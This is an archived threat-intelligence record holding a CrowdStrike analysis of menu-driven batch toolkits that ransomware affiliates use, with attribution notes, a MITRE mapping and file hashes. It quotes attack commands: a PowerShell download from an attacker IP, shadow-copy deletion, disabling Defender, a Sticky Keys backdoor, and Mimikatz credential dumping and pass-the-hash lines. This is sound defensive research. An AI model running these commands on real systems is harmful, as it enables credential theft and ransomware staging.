{
	"id": "5b571477-25dc-4892-a760-1dcff4974485",
	"created_at": "2026-04-06T00:19:06.34604Z",
	"updated_at": "2026-04-10T03:30:33.806877Z",
	"deleted_at": null,
	"sha1_hash": "c38b9e1026857432679324e780c737846f14d64c",
	"title": "Press #1 to Play: A Look Into eCrime Menu-style Toolkits | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 748204,
	"plain_text": "Press #1 to Play: A Look Into eCrime Menu-style Toolkits | CrowdStrike\r\nBy Radu Vlad\r\nArchived: 2026-04-05 14:21:01 UTC\r\nThe year 2020 has seen an accelerated uptick in eCrime activity, as well as an obvious shift in eCrime adversaries engaging\r\nin big game hunting (BGH) operations that involve interactive deployment of ransomware as a popular means to monetize\r\nintrusions, prioritizing critical enterprise infrastructure (domain controllers, file servers, backup servers, etc.) over\r\nworkstations.\r\nThe increasing availability of eCrime “syndication” models proliferating Ransomware as a Service (RaaS) programs grew in\r\npopularity as a threat vector and is one of the reasons behind the increasing volume of activity, allowing more novice threat\r\nactors to capitalize on the advanced skills of criminal malware developers and move from opportunistic breaches to targeted\r\nBGH ransomware campaigns.\r\nOur research suggests that there is collaboration between some eCrime groups operating ransomware, or at least some form\r\nof informal knowledge sharing. The commonalities include common tools, scripts and code snippets, as well as a set of\r\noverlapping tactics, techniques and procedures (TTPs).\r\nThroughout various observed intrusion attempts to stage ransomware, we have noticed the use of menu-style scripts to\r\nautomate execution to various degrees and help achieve faster actions on objectives. The complexity of these tools varies —\r\nsamples observed so far are either based on PowerShell, like Dharma's toolkit described by Sophos, or versatile custom\r\nbatch (.bat) files.\r\nWhat’s on the Menu for Today?\r\nThe following menu.bat tool was observed during what was likely a CIRCUS SPIDER affiliate intrusion, deploying\r\nNetwalker ransomware on the victim network. 
At this time, there is no evidence to support that this particular threat actor\r\nsupplies additional tooling to affiliates as part of the benefits of joining the program, other than the builder/builds of the\r\nransomware and access to the corresponding decryptors in exchange for a share of the profits. With this in mind, the toolkit\r\nused in the attack was likely either directly sourced or built by the affiliates themselves.\r\nFigure 1. Overview of main menu options, as seen in the menu.bat execution\r\nBased on a hard-coded path that the script calls in one of the options, we have identified a second script that likely ties in\r\nwith menu.bat. Run.bat employs the same menu-style options and was retrieved from an archive hosted on a public\r\nmalware repository that contained a number of common tools used by actors that stage ransomware, like PsExec and\r\nns64.exe, alongside one WinRAR self-extracting archive named menu.exe, which most likely contains the aforementioned\r\nmenu.bat.\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 1 of 6\n\nFigure 2. Overview of script code snippet, as seen in run.bat\r\nMenu.bat is something of a Swiss Army knife that enables the operator to easily switch between a choice of options that can\r\nquickly employ defense evasion, credential access, discovery, lateral movement tools or command lines. By comparison,\r\nRun.bat solely focuses on harvesting credentials. Both scripts implement common potentially unwanted programs (PUPs),\r\nand Mimikatz as the main credential harvester option.\r\nPick a Number, Any Number!\r\nOnce initial access has been obtained (the most common entry vectors being RDP credential spraying against web-facing\r\nhosts, previously stolen credentials, or vulnerable web applications), the operator proceeds with dropping the tools to the\r\ndesired staging location. 
Menu.bat implements PowerShell’s WebClient.DownloadFile method to grab WinRAR self-extracting password-protected archives hosted on the attacker’s infrastructure.\r\npowershell -Command \"(New-Object Net.WebClient).DownloadFile('http\u003c:\u003e//93.115.21\u003c.\u003e56\u003c:\u003e5983/sdjfjsdklfskld/pass/Collecto\r\nFigure 3. The attacker protects downloaded tooling through WinRAR self-extracting password-protected archives\r\nIt is likely that the actor has favored this method in order to minimize operational security risks and potentially thwart\r\nincident response efforts, in case any of the downloaded archives would have been left behind — this way, a defender will\r\nnot be able to easily identify what the artifacts are, without additional logging or telemetry capability. Other password\r\ncollection options include the use of “collector.exe,” “web.exe” and “credentials.exe.” While we were not able to\r\naccurately identify the tools stored in these archives, we presume that these might be part of the third-party Windows\r\nPassword Recovery Tools suite by Nirsoft due to the file names and the fact that these tools are heavily used by various\r\ngroups. These are legitimate tools used by administrators, but they are also commonly employed by various actors and\r\naffiliates, like Dharma operators. “Web.exe,” for example, likely stores WebBrowserPassView — a password recovery tool\r\nthat reveals the passwords stored in popular web browsers — and “credentials.exe” could hold\r\nCredentialsFileView.exe, which has the ability to decrypt and display passwords and other data stored inside Windows\r\ncredential files.\r\nFigure 4. 
Code snippet overview of various backdoor menu options menu.bat is able to deploy\r\nThe actor has implemented the option to deploy various remote access tools (RATs) to secure backdoor access — in this\r\nexample, the actor is likely dropping variations of the Quasar RAT (referenced as “Qwazar”) and Cobalt Strike on the target\r\nsystem. The three menu options for deploying Quasar seem to reflect the default Quasar client builder options, to set the\r\ninstallation directory to either the User’s %APPDATA% folder (erroneously called UAC in the script, most likely a typo),\r\nProgram Files, or the Windows System32 or SysWOW64 (both options requiring administrator privileges). The installation\r\nname in all cases will be “iexplorer.exe.”\r\nFigure 5. The attacker is using Advanced Port Scanner to map the victim’s network for available hosts\r\nThe scanner portion of the menu enables the operator to pull down both NS.exe and aps.exe from a server under their\r\ncontrol in order to map the compromised network for available hosts. Network Scanner (seen here as NS.exe) is a utility\r\nused to discover, describe and mount network shares. The tool was originally tracked as being employed by Dharma\r\noperators but is increasingly popular among various other ransomware operator groups. Advanced Port Scanner (named\r\naps.exe by the operator) is yet another popular and publicly available tool used in intrusions leading to ransomware.\r\nFigure 6. Overview of brute-force menu (brut) options, as seen in menu.bat. The attacker is using NLBrute to access other\r\nhosts on the victim’s network through RDP.\r\nThe toolkit also incorporates brute-forcing capabilities that leverage the well-known NLB (NLBrute.exe) tool — another\r\nransomware operator favorite — and rdpforcer RDP scanner, which enables the actor to perform lateral movement within\r\nthe network. 
The “CMD commands” portion of the menu contains a set of command line interface (CLI) instructions,\r\ngrouped into nine options.\r\nSub-menu Option Number | Sub-menu Option Name | Description\r\n1 | Session for 2 Users | Enables the operator to lift the limitation that Microsoft enforces on concurrent remote or local user connections, by app\r\nUniversal Terminal Server patch (essentially overriding Termsrv.dll) so that a remote user can log in to their account\r\ntheir account when physically at the computer.\r\n2 | Open RDP | Downloads and starts the OpenRDP.exe, another password-protected self-extracting archive. We were unable to accurat\r\nwe suspect it may hold another batch script to secure RDP access to the target system.\r\n3 | Delete Shadow Copies | Issues a vssadmin delete shadows /all command, one of the most commonly used methods employed by ransomwar\r\ncopies.\r\n4 | NewLocalUser-admin | Kicks off yet another set of post-exploitation commands, which involve the creation and addition of the “Adminitsrato\r\nAdministrator group, for persistence purposes, as well as enabling RDP and Remote Assistance on the remote machine,\r\nuser’s folder on disk and in the registry. This part of the script overlaps with both open source Post Exploitation code fre\r\ncollaboration platforms, as well as posts on various forums linked to pentesting.\r\n5 | Povishenie prav | Provides the operator with a local privilege escalation method by downloading the HTML Help Installation and Update\r\nused to exploit a privilege escalation vulnerability (CVE-2019-1388) in the Windows Certificate Dialog, allowing an att\r\nAUTHORITY\\SYSTEM.\r\n6 | Off Defender | Thwarts Windows Defender protection capability by issuing a powershell -Command \"Set-MpPreference -DisableReal\r\n7 | Zalipalka | Replaces the sethc.exe binary with Task Manager in a well-known variation of the Sticky Keys attack method. 
Choos\r\nattacker more flexibility, like the ability to perform a Lsass dump from taskmgr, kill processes and start any application\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t R\r\n8 | Off 2 minutes | Modifies RDP Connection Time control settings so the operator will not be disconnected from the Remote Desktop conn\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /v \"MaxConnectionTime\" /t REG_DWORD /d 0x0 /\r\n9 | Forse RESTART | Forces an immediate restart of the system. shutdown -r -t 0\r\n10 | Menu | Returns the operator to the main menu section of the script.\r\n0 | Exit | Closes script execution.\r\nTable 1. Details of the “CMD commands” sub-section, as seen in menu.bat.\r\nFinally, the menu.bat script allows the operator to issue a self-delete command of every item in the staging folder.\r\nRun.bat consists of six menu sections, most of which target credential access. It requires kiwi.exe to already be present on\r\ndisk, which can be previously downloaded via menu.bat or simply dropped to disk in the %TEMP%\\CCI\\CCW\\mimi folder.\r\nMenu Option Number | Menu Option Name | Description\r\n1 | Pass | This option uses Mimikatz to list all available provider credentials, and stores the output results in a .txt file.\r\nkiwi.exe \"privilege::debug\" \"log Result.txt\" \"sekurlsa::logonPasswords\" \"token::elevate\" \"lsadump::sam\" vault::cred exit\r\n2 | AD NTLM | Uses Mimikatz's dcsync option, which utilizes the Directory Replication Service (DRS) to retrieve the password hashes. 
The dom\r\nfor /f %%a in ('wmic ComputerSystem get Domain') do for /f %%b in (\"%%a\") do set y=%%b kiwi.exe \"log NTLMAD.txt\" \"privileg\r\n3 | Loger MIMI | Uses Mimikatz to inject a malicious Security Support Provider (SSP) into memory in order to capture passwords for all users tha\r\n4 | Vizov cmd ntlm Admina | Enables the operator to perform a Pass-the-Hash with Mimikatz using previously acquired password hashes.\r\nkiwi.exe \"sekurlsa::pth /user:%c% /domain:\u003cvictim domain\u003e /ntlm:%d% /run:cmd\" exit\r\n5 | Parser | Makes use of Parser.exe, a freeware utility for processing both fixed-length and field-delimited ASCII flat-file representations\r\nfrom the IP address and Computername of the target. Various other eCrime actors have favored similar implementations of this t\r\npasswords/NTLM login details.\r\ncd %TEMP%\\CCI\\CCW\\mimi Parser.exe FOR /F \"usebackq tokens=2 delims=\u003c\u003e\" %%i IN (`ping %Computername% -n 1 -4`) DO if not\r\nVariations of the above code are also used by Options 1 and 2 in order to organize results.\r\n6 | Clean And Exit | Kicks off a self-delete command of every item in the staging folder.\r\ncls cd %temp% rd /s /q %temp%\\CCI\r\n0 | Exit | Closes script execution.\r\nTable 2. Details of the available selection items, as seen in run.bat.\r\nAttribution\r\nSome of the command line sub-menu options and file names referenced throughout the two scripts appear to be using\r\ntransliterated Russian, a method of representing letters or words from the Cyrillic alphabet into Latin characters. “CMD\r\ncommands” sub-menu Option 5 (“Povishenie prav”) and the name of the downloaded hhupd.exe binary (“Prava\r\nadmina.exe”) roughly translate as “increasing rights” and “admin rights,” respectively. Command line sub-menu Option 7\r\ncould be slang for “залипат” (“to stick”). 
Menu Option 4 from the run.bat script (“Vizov cmd ntlm Admina”) is also a\r\nstrong indicator toward establishing attribution, with “vizov” meaning “calling” (“вызов”). This suggests that either the\r\noperator or the developer of these scripts may be based in a Slavic-speaking country, likely located in the eastern or\r\nsoutheastern Europe regions. The following table summarizes the toolkit’s capabilities and maps them to the relevant\r\nMITRE ATT\u0026CK® tactics.\r\nInitial Access: RDP credential spraying; Stolen RDP credentials\r\nExecution: Windows Command Shell; PowerShell\r\nPersistence: Accessibility Features; New Local Administrator Account; Quasar RAT; Cobalt Strike\r\nPrivilege Escalation: CVE-2019-1388\r\nDefense Evasion: Disable Windows Defender; Modify Registry Settings Related to RDP\r\nCredential Access: Mimikatz; Third-party Windows Password Recovery Tools\r\nDiscovery: NS.exe; Advanced Port Scanner\r\nLateral Movement: NLBrute; RDP Forcer\r\nCollection: N/A\r\nExfiltration: N/A\r\nI: D S C\r\nTable 3. Toolkit killchain\r\nConclusion\r\nThis case study shows how legitimate third-party “freeware” software, well-known security tools and publicly available\r\nexploits can easily be stitched together in a menu-style script to provide operators with a high execution tempo to achieve\r\ntheir goals. Human-interactive post-exploitation that delivers ransomware poses a significant and ever-increasing threat to\r\ncompanies as adversaries evolve and incorporate more techniques and capabilities in their toolkits. 
With the expected\r\ngrowth in BGH operations throughout this year, we will likely see actors continue to adapt and be more resourceful, as well\r\nas deploy in the field new tools similar to the one described. Security solutions such as the CrowdStrike Falcon® endpoint\r\nprotection platform come with many preventative features to protect against threats like human-operated ransomware\r\nintrusions. These features — which include machine learning (ML), behavioral preventions and executable quarantining —\r\nare highly effective at stopping ransomware and other common techniques that criminal organizations employ.\r\nIndicators of Compromise (IOCs)\r\nFile | SHA256\r\nmenu.bat | d2121e6774fb8cc6dc62ca112dabe7e10b1947fdac1b81d20c069a7fa90f6bb8\r\nrun.bat | 46564ec92a7c2e7335bbec9c261af9ec3869260b13e4bdaa318fd7e1867e9888\r\nAdditional Resources\r\nLearn about recent intrusion trends, adversary tactics and highlights of notable intrusions in the 2020 Threat\r\nHunting Report.\r\nUnderstand the trends and themes that we observed while responding to and remediating incidents around the globe\r\nin 2020 — download the latest CrowdStrike Services Cyber Front Lines Report.\r\nLearn more about the CrowdStrike Falcon® platform by visiting the product webpage.\r\nTest CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/"
	],
	"report_names": [
		"analysis-of-ecrime-menu-style-toolkits"
	],
	"threat_actors": [
		{
			"id": "53201ab8-30d2-4722-816e-f914604e78df",
			"created_at": "2022-10-25T16:07:23.466825Z",
			"updated_at": "2026-04-10T02:00:04.620188Z",
			"deleted_at": null,
			"main_name": "Circus Spider",
			"aliases": [],
			"source_name": "ETDA:Circus Spider",
			"tools": [
				"Koko Ransomware",
				"MailTo",
				"NetWalker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "373d61cc-32a0-4c0c-b48b-ff9e3f1357ac",
			"created_at": "2023-01-06T13:46:39.222456Z",
			"updated_at": "2026-04-10T02:00:03.250483Z",
			"deleted_at": null,
			"main_name": "CIRCUS SPIDER",
			"aliases": [],
			"source_name": "MISPGALAXY:CIRCUS SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.pdf",
		"text": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.txt",
		"img": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.jpg"
	}
}